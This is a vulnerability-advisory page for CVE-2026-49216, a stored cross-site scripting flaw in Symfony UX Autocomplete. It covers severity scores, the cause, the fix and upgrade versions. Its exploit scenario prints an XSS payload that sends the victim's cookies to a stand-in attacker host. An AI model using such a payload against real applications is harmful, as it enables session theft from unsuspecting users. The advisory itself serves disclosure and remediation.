Skip to main content

Symfony UX Autocomplete CVE-2026-49216

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-19 https://github.com/symfony/ux
Share

Severity by source

vuln.today AI
5.4 MEDIUM

Stored XSS requiring low-privilege write access to populate the data source (PR:L); victim must trigger the dropdown (UI:R); scope changes to the victim's browser (S:C).

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Estimated by vuln.today — no official severity rating has been published for this CVE yet.

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 19, 2026 - 21:45 vuln.today
Analysis Generated
Jun 19, 2026 - 21:45 vuln.today

DescriptionCVE.org

Description

The Stimulus controller shipped with symfony/ux-autocomplete renders AJAX response items into the dropdown by interpolating the text field directly into HTML template literals (<div>${item[labelField]}</div>) inside _createAutocompleteWithRemoteData(). The value is parsed as HTML rather than text, so any markup contained in the AJAX response is executed by the browser.

When the dropdown values are derived from user-supplied content, an attacker can craft a string that triggers stored XSS in the browser of any other user who later opens a page containing an autocomplete widget backed by the same data.

Resolution

The option and item renderers used in _createAutocompleteWithRemoteData() now use TomSelect's escape helper to HTML-escape the value by default. Endpoints that legitimately return HTML (for example, to highlight the search term) can opt back in to the previous behavior by setting options_as_html: true. The AutocompleteChoiceTypeExtension normalizer that previously forced options_as_html=false when autocomplete_url was set has been dropped so the opt-in is reachable from the form layer.

The patch for this issue is available here for branch 2.x (and forward-ported to 3.x).

Credits

Symfony would like to thank Alex Ashkov for reporting the issue and Hugo Alliaume for providing the fix.

AnalysisAI

Stored cross-site scripting in symfony/ux-autocomplete allows an attacker who can write user-controlled data to an AJAX autocomplete endpoint to execute arbitrary JavaScript in the browser of any user who subsequently loads a page containing an affected autocomplete widget. The Stimulus controller's _createAutocompleteWithRemoteData() function interpolates the text field from AJAX responses directly into HTML template literals without sanitization, causing the browser to parse and execute embedded markup. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker submits XSS payload via user-controlled input field
Delivery
Payload persists in application data store
Exploit
Victim loads page with AJAX autocomplete widget
Execution
Browser requests AJAX endpoint returning malicious text field
Persist
Stimulus controller interpolates unescaped value into DOM template literal
Impact
Injected markup executes in victim's browser context

Vulnerability AssessmentAI

Exploitation Exploitation requires two concurrent conditions: (1) the application uses `symfony/ux-autocomplete` with an AJAX-powered autocomplete widget configured via `autocomplete_url`, activating the vulnerable `_createAutocompleteWithRemoteData()` code path; and (2) the AJAX endpoint returns data derived from user-controlled input that has not been independently HTML-sanitized before storage. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment No official CVSS score has been assigned by NVD or Symfony at time of analysis, so severity must be inferred from the vulnerability class and context. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers an account or submits a form on an application that uses an AJAX-backed Symfony UX Autocomplete widget, entering a display name such as `<img src=x onerror="document.location='https://attacker.example/steal?c='+document.cookie">`. The malicious value is stored in the application's database and subsequently returned via the AJAX autocomplete endpoint. …
Remediation Upgrade symfony/ux-autocomplete to version 2.36.0 (for 2.x installations) or 3.1.0 (for 3.x installations) as confirmed by the vendor advisory at https://github.com/symfony/ux/security/advisories/GHSA-mwqm-4fw3-cjvr; the underlying fix is available at commit https://github.com/symfony/ux/commit/842ae54bc74de389299f975f01aafae272cb0019. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-49216 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy